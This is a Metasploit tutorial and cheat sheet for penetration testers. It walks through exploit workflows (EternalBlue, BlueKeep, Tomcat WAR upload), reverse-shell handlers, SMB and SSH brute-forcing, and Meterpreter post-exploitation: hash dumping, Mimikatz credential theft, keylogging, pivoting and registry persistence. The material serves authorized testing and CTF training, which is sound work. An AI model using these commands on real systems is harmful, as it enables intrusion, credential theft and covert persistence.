Metasploit

What is Metasploit?

Metasploit Framework is an open-source penetration testing platform maintained by Rapid7. It provides a unified environment for every phase of an engagement — from reconnaissance and vulnerability scanning, through exploitation and payload delivery, to post-exploitation, pivoting, and reporting. Its core interface is msfconsole, an interactive shell that gives access to over 2,000 exploit modules, hundreds of auxiliary scanners, and a rich post-exploitation toolkit including the powerful Meterpreter agent.

Metasploit is the glue that connects your other tools: use nmap to find open ports, look up the service version in Metasploit's exploit database, generate a payload with msfvenom, deliver it, catch the session with multi/handler, and pivot deeper with Meterpreter — all from within the same framework.

Installation

# Metasploit is pre-installed on Kali Linux
sudo apt update
sudo apt install metasploit-framework -y

# Initialize the database (required for workspace and search features)
sudo msfdb init

# Start msfconsole
msfconsole

# Start quietly (no banner)
msfconsole -q

# Check version
msfconsole --version

msfconsole Navigation

# Search for exploits, modules, or CVEs
search eternalblue
search type:exploit name:smb
search cve:2021-44228

# Get help on any command
help
help search
help use

# Show all available exploit modules
show exploits

# Show all auxiliary modules (scanners, fuzzers, etc.)
show auxiliary

# Show all post-exploitation modules
show post

# Check current module options
show options

# Show advanced options for a module
show advanced

# List loaded sessions
sessions -l

# Interact with a session by ID
sessions -i 1

Using an Exploit — Full Workflow

Every Metasploit engagement follows the same pattern: search, select, configure, verify, run.

# Step 1: Search for the exploit
search ms17-010

# Step 2: Select the module
use exploit/windows/smb/ms17_010_eternalblue

# Step 3: View required options
show options

# Step 4: Configure target and payload
set RHOSTS 10.10.10.40       # target IP
set LHOST 10.10.10.5         # your IP (for reverse connection)
set LPORT 4444               # your listening port
set PAYLOAD windows/x64/meterpreter/reverse_tcp

# Step 5: Verify the target is likely vulnerable
check

# Step 6: Run the exploit
run
# or
exploit

Common Exploit Examples

# EternalBlue — Windows SMB (MS17-010, WannaCry vector)
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.10.40
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.10.5
run

# BlueKeep — Windows RDP (CVE-2019-0708)
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS 10.10.10.40
run

# Tomcat Manager — upload malicious WAR file
use exploit/multi/http/tomcat_mgr_upload
set RHOSTS 10.10.10.95
set HttpUsername tomcat
set HttpPassword tomcat
set LHOST 10.10.10.5
run

# Multi/handler — catch any reverse shell (MSFvenom payloads)
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.10.5
set LPORT 4444
run

Auxiliary Modules — Scanning & Enumeration

# SMB version scanner
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
run

# SMB login brute-force
use auxiliary/scanner/smb/smb_login
set RHOSTS 10.10.10.40
set USER_FILE /usr/share/seclists/Usernames/top-usernames-shortlist.txt
set PASS_FILE /usr/share/wordlists/rockyou.txt
run

# SSH version + brute-force
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 10.10.10.40
set USERNAME root
set PASS_FILE /usr/share/wordlists/rockyou.txt
run

# HTTP directory scanner
use auxiliary/scanner/http/dir_scanner
set RHOSTS 10.10.10.40
set DICTIONARY /usr/share/seclists/Discovery/Web-Content/common.txt
run

# Port scanner (built-in)
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
set PORTS 22,80,443,445,3389
run

Meterpreter — Post-Exploitation

Meterpreter is Metasploit's advanced payload agent. Once you have a Meterpreter session, these commands run on the compromised host.

# System information
sysinfo
getuid
getpid

# File system navigation
pwd
ls
cd C:\\Users\\Administrator\\Desktop
download secret.txt /home/kali/
upload shell.exe C:\\Windows\\Temp\\

# Privilege escalation
getsystem           # attempt automatic privilege escalation
getuid              # confirm new privilege level

# Dump hashes (requires SYSTEM)
hashdump

# Load Kiwi (Mimikatz in memory — no file on disk)
load kiwi
creds_all

# Network reconnaissance from target
ipconfig
arp
route
portfwd add -l 8080 -p 80 -r 192.168.10.5   # port forwarding / pivoting

# Spawn a native shell
shell

# Screenshot the desktop
screenshot

# Keylogger
keyscan_start
keyscan_dump
keyscan_stop

# Background current session (return to msfconsole)
background

# Persistence — add autorun registry key
run persistence -X -i 30 -p 4444 -r 10.10.10.5

Workspaces

Workspaces let you organise scan results and sessions by engagement — essential when testing multiple clients.

# List workspaces
workspace

# Create a new workspace
workspace -a client_corp

# Switch workspace
workspace client_corp

# Delete a workspace
workspace -d old_project

# Import Nmap XML scan results into current workspace
db_import nmap_results.xml

# Run Nmap from within Metasploit and save to DB
db_nmap -sV -sC 10.10.10.40

# Show all hosts discovered in current workspace
hosts

# Show all services discovered
services

# Show all found credentials
creds

Essential msfconsole Commands

• search <term> — Search modules by name, CVE, or type
• use <module> — Select a module
• show options — Display required and optional settings
• set <option> <value> — Configure a module option
• setg <option> <value> — Set a global option (persists across modules)
• unset <option> — Clear an option value
• check — Check if target is vulnerable without exploiting
• run / exploit — Execute the selected module
• back — Exit current module without closing msfconsole
• sessions -l — List all active sessions
• sessions -i <id> — Interact with a session
• sessions -k <id> — Kill a session
• jobs — List background jobs
• db_nmap — Run Nmap and save results to Metasploit database
• hosts — Show all discovered hosts in workspace
• services — Show all discovered services
• vulns — Show discovered vulnerabilities
• creds — Show harvested credentials

Common Use Cases

• Exploiting known CVEs against unpatched services during authorized assessments
• Catching reverse shells from MSFvenom-generated payloads via multi/handler
• Post-exploitation with Meterpreter — credential dumping, pivoting, persistence
• Network and service enumeration with auxiliary scanner modules
• CTF challenges — virtually every beginner-to-intermediate CTF machine is Metasploit-compatible
• Testing patch compliance and vulnerability exposure in internal infrastructure

Further Reading

The Metasploit Unleashed course (metasploit.help.rapid7.com) is the definitive free resource for learning the framework systematically. For hands-on practice, TryHackMe's "Metasploit" module and machines like "Blue" (EternalBlue), "Legacy", and "Jerry" on HackTheBox are ideal starting points. Combine Metasploit with msfvenom for custom payload generation and Mimikatz (via Kiwi) for credential harvesting — together they cover the full exploitation lifecycle. Also explore hackzia.site labs for guided walkthroughs.